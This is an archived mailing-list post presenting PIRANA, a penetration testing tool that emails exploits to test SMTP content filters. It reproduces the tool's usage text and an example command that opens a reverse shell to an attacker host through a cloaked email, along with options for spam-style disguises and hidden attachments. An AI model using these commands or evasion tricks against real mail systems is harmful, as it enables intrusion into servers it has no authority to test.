HackFest Series: Pirana Email Holiday Greetings

Top Page
This message is part of the following thread:
Mthe complete thread tree sorted by date
 
 
Attachments:
Message as email
+ (text/plain)
Delete this message
Reply to this message
Author: Lisa Kachold
Date:  
To: Main PLUG discussion list, PLUG Applcations List
Subject: HackFest Series: Pirana Email Holiday Greetings
Pirana

PIRANA is a penetration testing framework to help in checking a SMTP
content filter's security. It works by attaching an exploit to an
email, optionally disguising it from content filters. PIRANA also lets
you choose from different type of shellcodes to use and has various
options to be stealthy.

http://www.guay-leroux.com/projects/SMTP%20content%20filters.pdf
http://backtrack.offensive-security.com/index.php/Tools#Pirana

Posted Last Year at Xmas to PLUG Archives from Backtrack2 (obfuscated
without full links or correct pirana.pl spelling):
http://www.mail-archive.com/plug-discuss@lists.plug.phoenix.az.us/msg08695.html

The Bt2 HowTo:
http://www.linuxhaxor.net/?p=337

Solutions to protect include clamav/spamassassin but this could depend
on your spamassassin and other installation specifics.

Pirana.pl example: Connect back with a reverse shell just by sending an email
using cloaking.


$ pirana.pl -e 4 -c 1 -l mynewshellhost -h mail.mydomain.com -a
[EMAIL PROTECTED]


Usage: pirana.pl [MANDATORY ARGS] [OPTIONAL ARGS] 

Mandatory arguments:
  -e+           Exploit number to use (See below)
  -h+           SMTP server to test
  -a+           Destination email address used in probing


Optional arguments:
  -s+          Shellcode type to inject into exploits (See below)
  -c+          Cloaking style (See below)
  -d+          Try to vanish attachments from MUA's view (See below)
  -v            Attach EICAR virus to improve stealthness
  -z            Pack all the malware into a tarball to be less noisy
  -p+          Port to use in reverse shell or bind shell
  -l+           Host to connect back in reverse shell mode


Valid exploits numbers:
   0            OSVDB #5753:    LHA get_header File Name Overflow
   1            OSVDB #5754:    LHA get_header Directory Name Overflow
   2            OSVDB #6456:    file readelf.c tryelf() ELF Header Overflow
   3            OSVDB #11695:   unarj Filename Handling Overflow
   4            OSVDB #23460:   ZOO combine File and Dir name overflow
   5            OSVDB #15867:   Convert UUlib uunconc integer overflow
   6            OSVDB #XXX:     ZOO next offset infinite loop DoS


Valid shellcode types:
   0            TCP reverse shell
   1            UDP reverse shell
   2            TCP bind shell


Valid cloaking styles (consult whitepaper for visual result):
   0            No cloaking at all (default)
   1            Viagra spam message
   2            "Look at the pictures I promised you!"


Vanishing techniques for attachments:
   0            No vanishing at all (default)
   1            Multipart/alternative trick
   2            <img src="image.JPG" width=0 height=0> trick



Test Test Test!
Merry merry merry!
--
Skype: (623)239-3392
AT&T: (503)754-4452
http://uncyclopedia.wikia.com/wiki/Santa
---------------------------------------------------
PLUG-discuss mailing list -
To subscribe, unsubscribe, or to change your mail settings:
http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss

This message was posted to the following mailing lists:
Plug Discuss
Mailing List Info | Nearby Messages		<-Re: Logmein beta for linux clientsQuestion About Module Loading->
Some Mailing List Archive administrated by UnconfiguredLurker (version 2.3)